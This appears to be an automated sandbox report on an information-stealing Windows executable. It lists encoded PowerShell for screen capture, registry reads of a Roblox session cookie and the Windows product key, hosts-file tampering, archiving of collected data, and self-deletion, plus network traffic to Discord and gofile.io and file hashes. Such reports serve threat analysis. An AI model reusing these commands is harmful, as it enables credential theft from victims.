ZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jrxtso5f\jrxtso5f.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC579.tmp" "c:\Users\Admin\AppData\Local\Temp\jrxtso5f\CSC29082FE3A58641C1883438A63B39E424.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4368"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4368
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3576"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3576
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1964"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1964
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1628"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1628
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2792"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2792
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4368"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4348"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4368
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4348
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3692"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3576"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3576
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3692
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1964"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1964
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4724"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4724
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1628"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1628
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2792"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2792
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4348"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4348
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3692"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3692
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4724"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4724
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI39082\rar.exe a -r -hp"bando123" "C:\Users\Admin\AppData\Local\Temp\SCwbR.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI39082\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI39082\rar.exe a -r -hp"bando123" "C:\Users\Admin\AppData\Local\Temp\SCwbR.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Downloads\Solus.exe""
C:\Windows\system32\PING.EXE
ping localhost -n 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-sfvkk.in | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 20.189.173.13:443 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.234.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 51.38.43.18:443 | gofile.io | tcp |
| FR | 51.38.43.18:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 51.178.66.33:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | 18.43.38.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 33.66.178.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.242.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store2.gofile.io | udp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| US | 8.8.8.8:53 | 239.123.112.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-c3set.in | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 211.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI37602\python311.dll
| MD5 | ccdbd8027f165575a66245f8e9d140de |
| SHA1 | d91786422ce1f1ad35c528d1c4cd28b753a81550 |
| SHA256 | 503cd34daed4f6d320731b368bbd940dbac1ff7003321a47d81d81d199cca971 |
| SHA512 | 870b54e4468db682b669887aeef1ffe496f3f69b219bda2405ac502d2dcd67b6542db6190ea6774abf1db5a7db429ce8f6d2fc5e88363569f15cf4df78da2311 |
memory/2280-25-0x00007FFB17EE0000-0x00007FFB184D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37602\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
C:\Users\Admin\AppData\Local\Temp\_MEI37602\base_library.zip
| MD5 | 4b011f052728ae5007f9ec4e97a4f625 |
| SHA1 | 9d940561f08104618ec9e901a9cd0cd13e8b355d |
| SHA256 | c88cd8549debc046a980b0be3bf27956ae72dcdcf1a448e55892194752c570e6 |
| SHA512 | be405d80d78a188a563086809c372c44bcd1ccab5a472d50714f559559795a1df49437c1712e15eb0403917c7f6cfaf872d6bb0c8e4dd67a512c2c4a5ae93055 |
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_ctypes.pyd
| MD5 | 343e1a85da03e0f80137719d48babc0f |
| SHA1 | 0702ba134b21881737585f40a5ddc9be788bab52 |
| SHA256 | 7b68a4ba895d7bf605a4571d093ae3190eac5e813a9eb131285ae74161d6d664 |
| SHA512 | 1b29efad26c0a536352bf8bb176a7fe9294e616cafb844c6d861561e59fbda35e1f7c510b42e8ed375561a5e1d2392b42f6021acc43133a27ae4b7006e465ba8 |
C:\Users\Admin\AppData\Local\Temp\_MEI37602\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
C:\Users\Admin\AppData\Local\Temp\_MEI37602\libssl-3.dll
| MD5 | 264be59ff04e5dcd1d020f16aab3c8cb |
| SHA1 | 2d7e186c688b34fdb4c85a3fce0beff39b15d50e |
| SHA256 | 358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d |
| SHA512 | 9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248 |
C:\Users\Admin\AppData\Local\Temp\_MEI37602\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI37602\libcrypto-3.dll
| MD5 | 7f1b899d2015164ab951d04ebb91e9ac |
| SHA1 | 1223986c8a1cbb57ef1725175986e15018cc9eab |
| SHA256 | 41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986 |
| SHA512 | ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d |
C:\Users\Admin\AppData\Local\Temp\_MEI37602\blank.aes
| MD5 | 824a93fcc182d9747e8ef9686f4c4951 |
| SHA1 | ac5e760be92eb0e74fc43dc725eaee1ceadb844f |
| SHA256 | 4431ce5d9c786ded474ffac933a27e2d307790c012b7bedc31b3c99b58ccb913 |
| SHA512 | b236279ce59ae1ac6a1c812c9fb06bf25547f6aef6f24607e1f569946a7299dd37f8e2b4f81182639166ca820901ee5fe9b32d0cc84cce77367b830af61fa3b0 |
memory/2280-32-0x00007FFB309C0000-0x00007FFB309CF000-memory.dmp
memory/2280-31-0x00007FFB27340000-0x00007FFB27364000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37602\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI37602\select.pyd
| MD5 | e4ab524f78a4cf31099b43b35d2faec3 |
| SHA1 | a9702669ef49b3a043ca5550383826d075167291 |
| SHA256 | bae0974390945520eb99ab32486c6a964691f8f4a028ac408d98fa8fb0db7d90 |
| SHA512 | 5fccfb3523c87ad5ab2cde4b9c104649c613388bc35b6561517ae573d3324f9191dd53c0f118b9808ba2907440cbc92aecfc77d0512ef81534e970118294cdee |
C:\Users\Admin\AppData\Local\Temp\_MEI37602\sqlite3.dll
| MD5 | 74b347668b4853771feb47c24e7ec99b |
| SHA1 | 21bd9ca6032f0739914429c1db3777808e4806b0 |
| SHA256 | 5913eb3f3d237632c2f0d6e32ca3e993a50b348033bb6e0da8d8139d44935f9e |
| SHA512 | 463d8864ada5f21a70f8db15961a680b00ee040a41ea660432d53d0ee3ccd292e6c11c4ec52d1d848a7d846ad3caf923cbc38535754d65bbe190e095f5acb8c3 |
C:\Users\Admin\AppData\Local\Temp\_MEI37602\unicodedata.pyd
| MD5 | bc28491251d94984c8555ed959544c11 |
| SHA1 | 964336b8c045bf8bb1f4d12de122cfc764df6a46 |
| SHA256 | f308681ef9c4bb4ea6adae93939466df1b51842554758cb2d003131d7558edd4 |
| SHA512 | 042d072d5f73fe3cd59394fc59436167c40b4e0cf7909afcad1968e0980b726845f09bf23b4455176b12083a91141474e9e0b7d8475afb0e3de8e1e4dbad7ec0 |
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_ssl.pyd
| MD5 | e5f6bff7a8c2cd5cb89f40376dad6797 |
| SHA1 | b854fd43b46a4e3390d5f9610004010e273d7f5f |
| SHA256 | 0f8493de58e70f3520e21e05d78cfd6a7fcde70d277e1874183e2a8c1d3fb7d5 |
| SHA512 | 5b7e6421ad39a61dabd498bd0f7aa959a781bc82954dd1a74858edfea43be8e3afe3d0cacb272fa69dc897374e91ea7c0570161cda7cc57e878b288045ee98d9 |
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_sqlite3.pyd
| MD5 | a9d2c3cf00431d2b8c8432e8fb1feefd |
| SHA1 | 1c3e2fe22e10e1e9c320c1e6f567850fd22c710c |
| SHA256 | aa0611c451b897d27dd16236ce723303199c6eacfc82314f342c7338b89009f3 |
| SHA512 | 1b5ada1dac2ab76f49de5c8e74542e190455551dfd1dfe45c9ccc3edb34276635613dbcfadd1e5f4383a0d851c6656a7840c327f64b50b234f8fdd469a02ef73 |
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_socket.pyd
| MD5 | 2957b2d82521ed0198851d12ed567746 |
| SHA1 | ad5fd781490ee9b1ad2dd03e74f0779fb5f9afc2 |
| SHA256 | 1e97a62f4f768fa75bac47bba09928d79b74d84711b6488905f8429cd46f94a2 |
| SHA512 | b557cf3fe6c0cc188c6acc0a43b44f82fcf3a6454f6ed7a066d75da21bb11e08cfa180699528c39b0075f4e79b0199bb05e57526e8617036411815ab9f406d35 |
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_queue.pyd
| MD5 | 0e5997263833ce8ce8a6a0ec35982a37 |
| SHA1 | 96372353f71aaa56b32030bb5f5dd5c29b854d50 |
| SHA256 | 0489700a866dddfa50d6ee289f7cca22c6dced9fa96541b45a04dc2ffb97122e |
| SHA512 | a00a667cc1bbd40befe747fbbc10f130dc5d03b777cbe244080498e75a952c17d80db86aa35f37b14640ed20ef21188ea99f3945553538e61797b575297c873f |
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_lzma.pyd
| MD5 | 932147ac29c593eb9e5244b67cf389bb |
